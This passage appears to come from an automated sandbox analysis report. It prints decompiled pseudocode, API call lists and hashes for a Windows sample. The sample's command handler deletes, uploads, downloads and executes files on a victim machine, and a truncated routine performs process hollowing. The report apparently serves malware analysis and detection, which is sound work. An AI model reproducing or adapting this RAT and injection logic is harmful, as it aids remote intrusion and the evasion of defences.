                                                                                                				_t8 = _a4;
                                                                                                				if(_t8 > 0xffffffe0) {
                                                                                                					L7:
                                                                                                					 *((intOrPtr*)(E00438932())) = 0xc;
                                                                                                					__eflags = 0;
                                                                                                					return 0;
                                                                                                				}
                                                                                                				if(_t8 == 0) {
                                                                                                					_t8 = _t8 + 1;
                                                                                                				}
                                                                                                				while(1) {
                                                                                                					_t4 = RtlAllocateHeap( *0x46da48, 0, _t8); // executed
                                                                                                					if(_t4 != 0) {
                                                                                                						break;
                                                                                                					}
                                                                                                					__eflags = E0044007A();
                                                                                                					if(__eflags == 0) {
                                                                                                						goto L7;
                                                                                                					}
                                                                                                					_t6 = E0043DAF9(_t7, _t8, __eflags, _t8);
                                                                                                					_pop(_t7);
                                                                                                					__eflags = _t6;
                                                                                                					if(_t6 == 0) {
                                                                                                						goto L7;
                                                                                                					}
                                                                                                				}
                                                                                                				return _t4;
                                                                                                			}









                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,0042FF99,?,?,00401696,?,?,?,?,?), ref: 00440C9E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: b87b444b0689b1bc68484dc88c6e83230c6fa494c1aa18da1c5914e8eab98513
                                                                                                • Instruction ID: 5852c7a619ddf7c9f9a534c792c37e70b0b3578afb37ceb8504e161c82b667f1
                                                                                                • Opcode Fuzzy Hash: b87b444b0689b1bc68484dc88c6e83230c6fa494c1aa18da1c5914e8eab98513
                                                                                                • Instruction Fuzzy Hash: DEE0E531548620DAF6243666AC40B5B3A4CAF913A1F100327AE429A290CB7CCC2146ED
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                C-Code - Quality: 83%
                                                                                                			E00406AEE(short* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                				char _v132;
                                                                                                				char _v136;
                                                                                                				char _v152;
                                                                                                				void* _v156;
                                                                                                				char _v160;
                                                                                                				char _v168;
                                                                                                				char _v176;
                                                                                                				char _v180;
                                                                                                				char _v184;
                                                                                                				void* _v200;
                                                                                                				char _v204;
                                                                                                				char _v216;
                                                                                                				void* _v224;
                                                                                                				void* _v228;
                                                                                                				char _v232;
                                                                                                				char _v236;
                                                                                                				char _v240;
                                                                                                				char _v248;
                                                                                                				char _v252;
                                                                                                				char _v256;
                                                                                                				void* _v260;
                                                                                                				char _v264;
                                                                                                				char _v272;
                                                                                                				char _v276;
                                                                                                				char _v280;
                                                                                                				char _v284;
                                                                                                				char _v288;
                                                                                                				char _v292;
                                                                                                				char _v296;
                                                                                                				char _v300;
                                                                                                				char _v304;
                                                                                                				char _v308;
                                                                                                				char _v312;
                                                                                                				void* _v324;
                                                                                                				void* _v332;
                                                                                                				char _v336;
                                                                                                				char _v348;
                                                                                                				char _v356;
                                                                                                				char _v360;
                                                                                                				char _v392;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed char _t160;
                                                                                                				signed int _t162;
                                                                                                				void* _t166;
                                                                                                				void* _t171;
                                                                                                				signed int _t172;
                                                                                                				void* _t187;
                                                                                                				void* _t202;
                                                                                                				signed int _t204;
                                                                                                				void* _t218;
                                                                                                				int _t228;
                                                                                                				void* _t235;
                                                                                                				void* _t236;
                                                                                                				void* _t249;
                                                                                                				void* _t256;
                                                                                                				signed int _t261;
                                                                                                				void* _t265;
                                                                                                				void* _t277;
                                                                                                				short* _t288;
                                                                                                				void* _t289;
                                                                                                				void* _t300;
                                                                                                				void* _t316;
                                                                                                				void* _t326;
                                                                                                				void* _t332;
                                                                                                				void* _t334;
                                                                                                				void* _t336;
                                                                                                				void* _t340;
                                                                                                				void* _t344;
                                                                                                				void* _t354;
                                                                                                				void* _t356;
                                                                                                				void* _t376;
                                                                                                				void* _t379;
                                                                                                				void* _t541;
                                                                                                				intOrPtr _t573;
                                                                                                				intOrPtr _t574;
                                                                                                				signed int _t575;
                                                                                                				signed int _t577;
                                                                                                				signed int _t580;
                                                                                                				void* _t586;
                                                                                                				void* _t588;
                                                                                                				void* _t590;
                                                                                                				void* _t592;
                                                                                                				void* _t594;
                                                                                                				signed int _t595;
                                                                                                				void* _t598;
                                                                                                				void* _t599;
                                                                                                				void* _t600;
                                                                                                				void* _t601;
                                                                                                				void* _t602;
                                                                                                				void* _t603;
                                                                                                				void* _t604;
                                                                                                				void* _t607;
                                                                                                				void* _t611;
                                                                                                				void* _t612;
                                                                                                				void* _t613;
                                                                                                				void* _t615;
                                                                                                				void* _t617;
                                                                                                				void* _t636;
                                                                                                				void* _t637;
                                                                                                				void* _t638;
                                                                                                				void* _t639;
                                                                                                				void* _t642;
                                                                                                				void* _t644;
                                                                                                
                                                                                                				_t643 = __eflags;
                                                                                                				_t549 = __edx;
                                                                                                				_push(_t356);
                                                                                                				_t573 = _a4;
                                                                                                				E004020DE(_t356,  &_v180, __edx, __eflags, _t573 + 0xc);
                                                                                                				SetEvent( *(_t573 + 0x24));
                                                                                                				_t574 =  *((intOrPtr*)(E00401F87( &_v184)));
                                                                                                				E00404287( &_v184,  &_v160, 4, 0xffffffff);
                                                                                                				_t598 = (_t595 & 0xfffffff8) - 0x104;
                                                                                                				E004020DE(_t356, _t598, _t549, _t643, 0x46e250);
                                                                                                				_t599 = _t598 - 0x18;
                                                                                                				E004020DE(_t356, _t599, _t549, _t643,  &_v176);
                                                                                                				E00417E68( &_v312, _t549);
                                                                                                				_t600 = _t599 + 0x30;
                                                                                                				_t644 = _t574 - 0x8b;
                                                                                                				if(_t644 > 0) {
                                                                                                					_t575 = _t574 - 0x8c;
                                                                                                					__eflags = _t575;
                                                                                                					if(__eflags == 0) {
                                                                                                						E00404260(_t356,  &_v280, E00401F87(E00401E3B( &_v288, _t549, __eflags, 0)));
                                                                                                						_t160 = GetFileAttributesW(E00401EDD( &_v284));
                                                                                                						__eflags = _t160 & 0x00000010;
                                                                                                						if((_t160 & 0x00000010) == 0) {
                                                                                                							_t162 = DeleteFileW(E00401EDD( &_v284));
                                                                                                						} else {
                                                                                                							_t162 = E00418144(E00401EDD( &_v284));
                                                                                                						}
                                                                                                						__eflags = _t162;
                                                                                                						__eflags = _t162 & 0xffffff00 | _t162 != 0x00000000;
                                                                                                						if(__eflags == 0) {
                                                                                                							_t601 = _t600 - 0x18;
                                                                                                							E00417D8C(_t356, _t601,  &_v276);
                                                                                                							_push(0x55);
                                                                                                							E00404BB7(_t356, 0x46e318,  &_v276, __eflags);
                                                                                                							_t166 = E00417D2B( &_v232,  &_v304);
                                                                                                							_t602 = _t601 - 0x18;
                                                                                                							_t552 = "Unable to delete: ";
                                                                                                							E004053F2(_t356, _t602, "Unable to delete: ", 0x46e250, __eflags, _t166);
                                                                                                							_t603 = _t602 - 0x14;
                                                                                                							_t376 = _t603;
                                                                                                							_push("E");
                                                                                                						} else {
                                                                                                							_t187 = E00417D2B( &_v204,  &_v276);
                                                                                                							_t607 = _t600 - 0x18;
                                                                                                							_t552 = "Deleted file: ";
                                                                                                							E004053F2(_t356, _t607, "Deleted file: ", 0x46e250, __eflags, _t187);
                                                                                                							_t603 = _t607 - 0x14;
                                                                                                							_t376 = _t603;
                                                                                                							_push("i");
                                                                                                						}
                                                                                                						E00402076(_t356, _t376);
                                                                                                						E00417670(_t356, 0x46e250);
                                                                                                						_t604 = _t603 + 0x30;
                                                                                                						E00401FB9();
                                                                                                						_t171 = E00401E3B( &_v312, _t552, __eflags, 1);
                                                                                                						_t549 = "1";
                                                                                                						_t379 = _t171;
                                                                                                						_t172 = E00405C1B("1");
                                                                                                						__eflags = _t172;
                                                                                                						if(_t172 == 0) {
                                                                                                							L40:
                                                                                                							E00401EE2();
                                                                                                							L41:
                                                                                                							E00401E66( &_v308, _t549);
                                                                                                							E00401FB9();
                                                                                                							E00401FB9();
                                                                                                							return 0;
                                                                                                						} else {
                                                                                                							__eflags = E00407486( &_v296, _t379, _t379) + 1;
                                                                                                							E004074A2(E00407486( &_v296, _t379, _t379) + 1);
                                                                                                							_t549 =  &_v308;
                                                                                                							E00401EEC( &_v308,  &_v308, _t575, E00402FEC(_t356,  &_v236,  &_v308, 0x2a));
                                                                                                							E00401EE2();
                                                                                                							E00404260(_t356, _t604 - 0x18, E00401EDD( &_v312));
                                                                                                							L39:
                                                                                                							E00406360();
                                                                                                							goto L40;
                                                                                                						}
                                                                                                					}
                                                                                                					_t577 = _t575 - 1;
                                                                                                					__eflags = _t577;
                                                                                                					if(__eflags == 0) {
                                                                                                						E00404260(_t356,  &_v280, E00401F87(E00401E3B( &_v288, _t549, __eflags, 0)));
                                                                                                						E00404260(_t356,  &_v240, E00401F87(E00401E3B( &_v296, _t549, __eflags, 1)));
                                                                                                						E0040746C( &_v300,  &_v276, 0, E00407486( &_v292,  &_v240,  &_v240) + 1);
                                                                                                						_t202 = E00401EDD(E00407749( &_v240,  &_v288,  &_v264));
                                                                                                						_t204 = E00437BC0(E00401EDD( &_v312), _t202);
                                                                                                						asm("sbb bl, bl");
                                                                                                						E00401EE2();
                                                                                                						_t360 =  ~_t204 + 1;
                                                                                                						__eflags =  ~_t204 + 1;
                                                                                                						if(__eflags == 0) {
                                                                                                							_t549 = E00405416( &_v204, "Unable to rename file!", __eflags, 0x46e250);
                                                                                                							E004076BB(_t360, _t600 - 0x18, _t206, 0x46e250, __eflags, "16");
                                                                                                							_push(0x59);
                                                                                                							E00404BB7(_t360, 0x46e318, _t206, __eflags);
                                                                                                							E00401FB9();
                                                                                                						} else {
                                                                                                							_t549 =  &_v252;
                                                                                                							E00407677(_t600 - 0x18,  &_v252, __eflags, "*");
                                                                                                							E00406360();
                                                                                                						}
                                                                                                						E00401EE2();
                                                                                                						L13:
                                                                                                						E00401EE2();
                                                                                                						goto L40;
                                                                                                					}
                                                                                                					_t580 = _t577 - 1;
                                                                                                					__eflags = _t580;
                                                                                                					if(__eflags == 0) {
                                                                                                						E00404260(_t356,  &_v280, E00401F87(E00401E3B( &_v288, _t549, __eflags, 0)));
                                                                                                						_t218 = E00401F87(E00401E3B( &_v296, _t549, __eflags, 1));
                                                                                                						_t549 =  &_v288;
                                                                                                						CreateDirectoryW(E00401EDD(E00407677( &_v216,  &_v288, __eflags, _t218)), 0);
                                                                                                						E00401EE2();
                                                                                                						E004032F2(0x2a);
                                                                                                						E004074B3(_t356, _t600 - 0x18,  &_v288, __eflags,  &_v292);
                                                                                                						goto L39;
                                                                                                					}
                                                                                                					_t582 = _t580 - 3;
                                                                                                					__eflags = _t580 - 3;
                                                                                                					if(__eflags == 0) {
                                                                                                						_t228 = StrToIntA(E00401F87(E00401E3B( &_v288, _t549, __eflags, _t582)));
                                                                                                						_t549 = E00401F87(E00401E3B( &_v292, _t549, __eflags, 1));
                                                                                                						E00418900(_t228, _t230);
                                                                                                					}
                                                                                                					goto L41;
                                                                                                				}
                                                                                                				if(_t644 == 0) {
                                                                                                					E004020C7(_t356,  &_v204);
                                                                                                					E004047EF(1);
                                                                                                					E004049DE( &_v136, _t574,  &_v132);
                                                                                                					_t235 = E00401E3B( &_v296, _t549, __eflags, 3);
                                                                                                					_t611 = _t600 - 0x18;
                                                                                                					_t236 = E00401E3B( &_v300, _t549, __eflags, 2);
                                                                                                					E00402F85(_t356, _t611, E00402F85(_t356,  &_v248, E00402F85(_t356,  &_v272, E00402FA9( &_v296, E00401E3B( &_v304, _t549, __eflags, 1), 0x46e250), __eflags, _t236), __eflags, 0x46e250), __eflags, _t235);
                                                                                                					E00404BB7(_t356,  &_v152, _t240, __eflags);
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					_t69 =  &_v336; // 0x56
                                                                                                					E00404260(_t356,  &_v304, E00401F87(E00401E3B(_t69, _t240, __eflags, 0)));
                                                                                                					_t249 = E00417D2B( &_v284,  &_v308);
                                                                                                					_t612 = _t611 - 0x18;
                                                                                                					E004053F2(_t356, _t612, "Downloading file: ", 0x46e250, __eflags, _t249);
                                                                                                					_t613 = _t612 - 0x14;
                                                                                                					E00402076(_t356, _t613, "i");
                                                                                                					E00417670(_t356, "i");
                                                                                                					E00401FB9();
                                                                                                					E00401EE2();
                                                                                                					_t256 = E00401F87(E00401E3B( &_v348, "Downloading file: ", __eflags, 0));
                                                                                                					_t615 = _t613 + 0x30 - 0x18;
                                                                                                					E00404260(_t356, _t615, _t256);
                                                                                                					_t261 = E00406475( &_v204, __eflags, E00437B10(_t258, E00401F87(E00401E3B( &_v356, "Downloading file: ", __eflags, 4)), 0, 0xa), "Downloading file: ", 0x56);
                                                                                                					_t617 = _t615 + 0x2c;
                                                                                                					_push(0);
                                                                                                					__eflags = _t261;
                                                                                                					if(__eflags == 0) {
                                                                                                						E00404260(_t356,  &_v276, E00401F87(E00401E3B( &_v360, "Downloading file: ", __eflags)));
                                                                                                						_t265 = E00417D2B( &_v256,  &_v280);
                                                                                                						_t549 = "Failed to download file: ";
                                                                                                						E004053F2(_t356, _t617 - 0x18, "Failed to download file: ", "i", __eflags, _t265);
                                                                                                						E00402076(_t356, _t617 - 4, "E");
                                                                                                						E00417670(_t356, "i");
                                                                                                						E00401FB9();
                                                                                                						E00401EE2();
                                                                                                					} else {
                                                                                                						E00404260(_t356,  &_v276, E00401F87(E00401E3B( &_v360, "Downloading file: ", __eflags)));
                                                                                                						_t277 = E00417D2B( &_v256,  &_v280);
                                                                                                						_t549 = "Downloaded file: ";
                                                                                                						E004053F2(_t356, _t617 - 0x18, "Downloaded file: ", "i", __eflags, _t277);
                                                                                                						E00402076(_t356, _t617 - 4, "i");
                                                                                                						E00417670(_t356, "i");
                                                                                                						E00401FB9();
                                                                                                						E00401EE2();
                                                                                                						E00402076(_t356, _t617 - 4 + 0x30 - 0x18, 0x460734);
                                                                                                						_push(0x58);
                                                                                                						E00404BB7(_t356,  &_v168, "Downloaded file: ", __eflags);
                                                                                                					}
                                                                                                					E00404F18( &_v152, _t549);
                                                                                                					E00404FD6(_t356,  &_v152, _t549, 0);
                                                                                                					L15:
                                                                                                					E00401FB9();
                                                                                                					goto L41;
                                                                                                				}
                                                                                                				_t586 = _t574 - 0x61;
                                                                                                				if(_t586 == 0) {
                                                                                                					E00404260(_t356, _t600 - 0x18, E00401F87(E00401E3B( &_v288, _t549, __eflags, 0)));
                                                                                                					_t288 = E00401E3B( &_v296, _t549, __eflags, 2);
                                                                                                					_t289 = E00401E3B( &_v300, _t549, __eflags, 1);
                                                                                                					_t549 = _t288;
                                                                                                					E00417382(_t289, _t288);
                                                                                                					goto L41;
                                                                                                				}
                                                                                                				_t588 = _t586 - 0x26;
                                                                                                				if(_t588 == 0) {
                                                                                                					GetLogicalDriveStringsA(0x64,  &_v132);
                                                                                                					E0040209D(_t356,  &_v276, _t549, __eflags,  &_v132, 0x64);
                                                                                                					__eflags = E004074FA( &_v284, 0x4608d0, 0, 2) + 1;
                                                                                                					E00401F76(E004074FA( &_v284, 0x4608d0, 0, 2) + 1);
                                                                                                					E004020DE(_t356, _t600 - 0x18, _t549, E004074FA( &_v284, 0x4608d0, 0, 2) + 1,  &_v300);
                                                                                                					_t300 = E004065A3(_t356,  &_v280);
                                                                                                					_t549 = E00402FA9( &_v256,  &_v304, 0x46e250);
                                                                                                					E00402F0F(_t600 - 0x18, _t301, _t300);
                                                                                                					_push(0x51);
                                                                                                					E00404BB7(_t356, 0x46e318, _t301, __eflags);
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					goto L15;
                                                                                                				}
                                                                                                				_t590 = _t588 - 1;
                                                                                                				if(_t590 == 0) {
                                                                                                					E00404260(_t356,  &_v280, E00401F87(E00401E3B( &_v288, _t549, __eflags, 0)));
                                                                                                					E004074B3(_t356, _t600 - 0x18, _t549, __eflags,  &_v284);
                                                                                                					E00406360();
                                                                                                					__eflags = E0040247B() - 2;
                                                                                                					_t316 = E00417D2B( &_v252, E0040746C( &_v288,  &_v264, 0, E0040247B() - 2));
                                                                                                					_t549 = "Browsing directory: ";
                                                                                                					E004053F2(_t356, _t600 - 0x18 + 0x18 - 0x18, "Browsing directory: ", 0x46e250, E0040247B() - 2, _t316);
                                                                                                					E00402076(_t356, _t600 - 0x18 + 0x18 - 4, "i");
                                                                                                					E00417670(_t356, 0x46e250);
                                                                                                					E00401FB9();
                                                                                                					goto L13;
                                                                                                				}
                                                                                                				_t592 = _t590 - 1;
                                                                                                				if(_t592 == 0) {
                                                                                                					E00404260(_t356,  &_v280, E00401F87(E00401E3B( &_v288, _t549, __eflags, 0)));
                                                                                                					ShellExecuteW(0, L"open", E00401EDD( &_v284), 0, 0, 1);
                                                                                                					_t326 = E00417D2B( &_v236,  &_v284);
                                                                                                					_t549 = "Executing file: ";
                                                                                                					E004053F2(_t356, _t600 - 0x18, "Executing file: ", 0x46e250, __eflags, _t326);
                                                                                                					E00402076(_t356, _t600 - 4, "i");
                                                                                                					E00417670(_t356, 0x46e250);
                                                                                                					E00401FB9();
                                                                                                					goto L40;
                                                                                                				} else {
                                                                                                					_t594 = _t592 - 1;
                                                                                                					_t649 = _t594;
                                                                                                					if(_t594 == 0) {
                                                                                                						E00407456( &_v132);
                                                                                                						_t332 = E00401E3B( &_v288, _t549, _t649, 3);
                                                                                                						_t636 = _t600 - 0x18;
                                                                                                						E004020DE(_t356, _t636, _t549, _t649, _t332);
                                                                                                						_t334 = E00401E3B( &_v296, _t549, _t649, 2);
                                                                                                						_t637 = _t636 - 0x18;
                                                                                                						E004020DE(_t356, _t637, _t549, _t649, _t334);
                                                                                                						_t336 = E00401E3B( &_v304, _t549, _t649, 1);
                                                                                                						_t638 = _t637 - 0x18;
                                                                                                						E004020DE(_t356, _t638, _t549, _t649, _t336);
                                                                                                						_push(E00401F87(E00401E3B( &_v312, _t549, _t649, _t594)));
                                                                                                						_t340 = E0040663F( &_v160, _t549, _t649);
                                                                                                						_push(_t594);
                                                                                                						_t650 = _t340;
                                                                                                						if(_t340 == 0) {
                                                                                                							E00404260(_t356,  &_v276, E00401F87(E00401E3B( &_v392, _t549, __eflags)));
                                                                                                							_t344 = E00417D2B( &_v256,  &_v280);
                                                                                                							_t639 = _t638 - 0x18;
                                                                                                							_t549 = "Failed to upload file: ";
                                                                                                							E004053F2(_t356, _t639, "Failed to upload file: ", 0x46e250, __eflags, _t344);
                                                                                                							_t541 = _t639 - 0x14;
                                                                                                							_push("E");
                                                                                                						} else {
                                                                                                							E00404260(_t356,  &_v276, E00401F87(E00401E3B( &_v392, _t549, _t650)));
                                                                                                							_t354 = E00417D2B( &_v256,  &_v280);
                                                                                                							_t642 = _t638 - 0x18;
                                                                                                							_t549 = "Uploaded file: ";
                                                                                                							E004053F2(_t356, _t642, "Uploaded file: ", 0x46e250, _t650, _t354);
                                                                                                							_t541 = _t642 - 0x14;
                                                                                                							_push("i");
                                                                                                						}
                                                                                                						E00402076(_t356, _t541);
                                                                                                						E00417670(_t356, 0x46e250);
                                                                                                						E00401FB9();
                                                                                                						E00401EE2();
                                                                                                						E00407464();
                                                                                                					}
                                                                                                					goto L41;
                                                                                                				}
                                                                                                			}

                                                                                                0x004072ca
                                                                                                0x00407278
                                                                                                0x0040727b
                                                                                                0x00407286
                                                                                                0x0040728c
                                                                                                0x00407291
                                                                                                0x004072d3
                                                                                                0x00406dd0
                                                                                                0x00406dd0
                                                                                                0x00000000
                                                                                                0x00406dd0
                                                                                                0x00407126
                                                                                                0x00407126
                                                                                                0x00407129
                                                                                                0x00407186
                                                                                                0x00407199
                                                                                                0x0040719f
                                                                                                0x004071b5
                                                                                                0x004071bf
                                                                                                0x004071ca
                                                                                                0x004071d9
                                                                                                0x00000000
                                                                                                0x004071d9
                                                                                                0x0040712b
                                                                                                0x0040712b
                                                                                                0x0040712e
                                                                                                0x00407146
                                                                                                0x00407160
                                                                                                0x00407164
                                                                                                0x00407164
                                                                                                0x00000000
                                                                                                0x0040712e
                                                                                                0x00406b74
                                                                                                0x00406ec4
                                                                                                0x00406ed2
                                                                                                0x00406edf
                                                                                                0x00406eea
                                                                                                0x00406eef
                                                                                                0x00406efc
                                                                                                0x00406f36
                                                                                                0x00406f45
                                                                                                0x00406f4e
                                                                                                0x00406f57
                                                                                                0x00406f60
                                                                                                0x00406f67
                                                                                                0x00406f7d
                                                                                                0x00406f8a
                                                                                                0x00406f8f
                                                                                                0x00406f9a
                                                                                                0x00406f9f
                                                                                                0x00406faa
                                                                                                0x00406faf
                                                                                                0x00406fbb
                                                                                                0x00406fc4
                                                                                                0x00406fd5
                                                                                                0x00406fda
                                                                                                0x00406fe0
                                                                                                0x0040700c
                                                                                                0x00407011
                                                                                                0x00407018
                                                                                                0x00407019
                                                                                                0x0040701b
                                                                                                0x004070a5
                                                                                                0x004070b2
                                                                                                0x004070ba
                                                                                                0x004070c2
                                                                                                0x004070d1
                                                                                                0x004070d6
                                                                                                0x004070e2
                                                                                                0x004070eb
                                                                                                0x0040701d
                                                                                                0x0040702e
                                                                                                0x0040703b
                                                                                                0x00407043
                                                                                                0x0040704b
                                                                                                0x00407056
                                                                                                0x0040705b
                                                                                                0x00407067
                                                                                                0x00407070
                                                                                                0x0040707f
                                                                                                0x00407084
                                                                                                0x0040708d
                                                                                                0x0040708d
                                                                                                0x004070f7
                                                                                                0x00407103
                                                                                                0x00406e70
                                                                                                0x00406e70
                                                                                                0x00000000
                                                                                                0x00406e70
                                                                                                0x00406b7a
                                                                                                0x00406b7d
                                                                                                0x00406e92
                                                                                                0x00406e9d
                                                                                                0x00406eaa
                                                                                                0x00406eaf
                                                                                                0x00406eb3
                                                                                                0x00000000
                                                                                                0x00406eb8
                                                                                                0x00406b83
                                                                                                0x00406b86
                                                                                                0x00406de4
                                                                                                0x00406df8
                                                                                                0x00406e0f
                                                                                                0x00406e15
                                                                                                0x00406e24
                                                                                                0x00406e2d
                                                                                                0x00406e44
                                                                                                0x00406e48
                                                                                                0x00406e4e
                                                                                                0x00406e55
                                                                                                0x00406e5e
                                                                                                0x00406e67
                                                                                                0x00000000
                                                                                                0x00406e6c
                                                                                                0x00406b8c
                                                                                                0x00406b8f
                                                                                                0x00406d59
                                                                                                0x00406d68
                                                                                                0x00406d6d
                                                                                                0x00406d7e
                                                                                                0x00406d97
                                                                                                0x00406d9f
                                                                                                0x00406da7
                                                                                                0x00406db6
                                                                                                0x00406dbb
                                                                                                0x00406dc7
                                                                                                0x00000000
                                                                                                0x00406dcc
                                                                                                0x00406b95
                                                                                                0x00406b98
                                                                                                0x00406ce0
                                                                                                0x00406cf9
                                                                                                0x00406d07
                                                                                                0x00406d0f
                                                                                                0x00406d17
                                                                                                0x00406d26
                                                                                                0x00406d2b
                                                                                                0x00406d37
                                                                                                0x00000000
                                                                                                0x00406b9e
                                                                                                0x00406b9e
                                                                                                0x00406b9e
                                                                                                0x00406ba1
                                                                                                0x00406bae
                                                                                                0x00406bb9
                                                                                                0x00406bbe
                                                                                                0x00406bc4
                                                                                                0x00406bcf
                                                                                                0x00406bd4
                                                                                                0x00406bda
                                                                                                0x00406be5
                                                                                                0x00406bea
                                                                                                0x00406bf0
                                                                                                0x00406c06
                                                                                                0x00406c0e
                                                                                                0x00406c17
                                                                                                0x00406c18
                                                                                                0x00406c1a
                                                                                                0x00406c6c
                                                                                                0x00406c79
                                                                                                0x00406c7e
                                                                                                0x00406c81
                                                                                                0x00406c89
                                                                                                0x00406c91
                                                                                                0x00406c93
                                                                                                0x00406c1c
                                                                                                0x00406c2d
                                                                                                0x00406c3a
                                                                                                0x00406c3f
                                                                                                0x00406c42
                                                                                                0x00406c4a
                                                                                                0x00406c52
                                                                                                0x00406c54
                                                                                                0x00406c54
                                                                                                0x00406c98
                                                                                                0x00406c9d
                                                                                                0x00406ca9
                                                                                                0x00406cb2
                                                                                                0x00406cbe
                                                                                                0x00406cbe
                                                                                                0x00000000
                                                                                                0x00406ba1

                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,?), ref: 00406B10
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406CF9
                                                                                                  • Part of subcall function 0040663F: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0040667C
                                                                                                  • Part of subcall function 00417670: GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                  • Part of subcall function 00407677: char_traits.LIBCPMT ref: 00407692
                                                                                                • GetLogicalDriveStringsA.KERNEL32 ref: 00406DE4
                                                                                                • StrToIntA.SHLWAPI(00000000,?), ref: 00407146
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 004071B5
                                                                                                  • Part of subcall function 00406360: FindFirstFileW.KERNEL32(00000000,?), ref: 0040637B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: CreateFile$DirectoryDriveEventExecuteFindFirstLocalLogicalShellStringsTimechar_traitssend
                                                                                                • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Failed to upload file: $PF$Unable to delete: $Unable to rename file!$Uploaded file: $VPF$open
                                                                                                • API String ID: 250922350-1502489740
                                                                                                • Opcode ID: f22b2b76d64d057f2749c1991440be0bd0246d7df056fd89cd72aaaa9fd807df
                                                                                                • Instruction ID: 51d4d6a48ea50cd7a2bdc639e76df59bb0010e2f68b5afca2e8c2586ef65caae
                                                                                                • Opcode Fuzzy Hash: f22b2b76d64d057f2749c1991440be0bd0246d7df056fd89cd72aaaa9fd807df
                                                                                                • Instruction Fuzzy Hash: CF2282716083015BC608F776C857DAF77A9AF91348F40093EF943671E2EE789A09C69B
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 86%
                                                                                                			E00414B29(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4) {
                                                                                                				void _v8;
                                                                                                				signed int _v12;
                                                                                                				void* _v16;
                                                                                                				CONTEXT* _v20;
                                                                                                				WCHAR* _v24;
                                                                                                				struct _STARTUPINFOW _v92;
                                                                                                				void* __edi;
                                                                                                				void* _t58;
                                                                                                				void* _t72;
                                                                                                				void* _t73;
                                                                                                				int _t83;
                                                                                                				intOrPtr* _t95;
                                                                                                				void* _t98;
                                                                                                				signed int _t102;
                                                                                                				void* _t104;
                                                                                                				void* _t106;
                                                                                                				CONTEXT* _t110;
                                                                                                				void* _t113;
                                                                                                				CONTEXT* _t114;
                                                                                                				struct _PROCESS_INFORMATION* _t116;
                                                                                                
                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                				_v16 = __edx;
                                                                                                				_v24 = __ecx;
                                                                                                				if( *__edx == 0x5a4d) {
                                                                                                					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
                                                                                                					if( *_t95 == 0x4550) {
                                                                                                						_push(_t106);
                                                                                                						E00432D80(_t106,  &_v92, 0, 0x44);
                                                                                                						_t116 = _a4;
                                                                                                						asm("stosd");
                                                                                                						asm("stosd");
                                                                                                						asm("stosd");
                                                                                                						asm("stosd");
                                                                                                						if(CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116) == 0) {
                                                                                                							L21:
                                                                                                							_t58 = 0;
                                                                                                							L22:
                                                                                                							L23:
                                                                                                							return _t58;
                                                                                                						}
                                                                                                						CloseHandle(_v92.hStdInput);
                                                                                                						CloseHandle(_v92.hStdOutput);
                                                                                                						CloseHandle(_v92.hStdError);
                                                                                                						_t110 = VirtualAlloc(0, 4, 0x1000, 4);
                                                                                                						_v20 = _t110;
                                                                                                						_t110->ContextFlags = 0x10007;
                                                                                                						_t14 =  &(_t116->hThread); // 0xffffdd03
                                                                                                						if(GetThreadContext( *_t14, _t110) == 0 || ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0) == 0) {
                                                                                                							L20:
                                                                                                							TerminateProcess(_t116->hProcess, 0);
                                                                                                							CloseHandle(_t116->hProcess);
                                                                                                							_t50 =  &(_t116->hThread); // 0xffffdd03
                                                                                                							CloseHandle( *_t50);
                                                                                                							asm("stosd");
                                                                                                							asm("stosd");
                                                                                                							asm("stosd");
                                                                                                							asm("stosd");
                                                                                                							goto L21;
                                                                                                						} else {
                                                                                                							_t72 = _v8;
                                                                                                							if(_t72 ==  *(_t95 + 0x34)) {
                                                                                                								NtUnmapViewOfSection(_t116->hProcess, _t72);
                                                                                                							}
                                                                                                							_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40);
                                                                                                							_v24 = _t73;
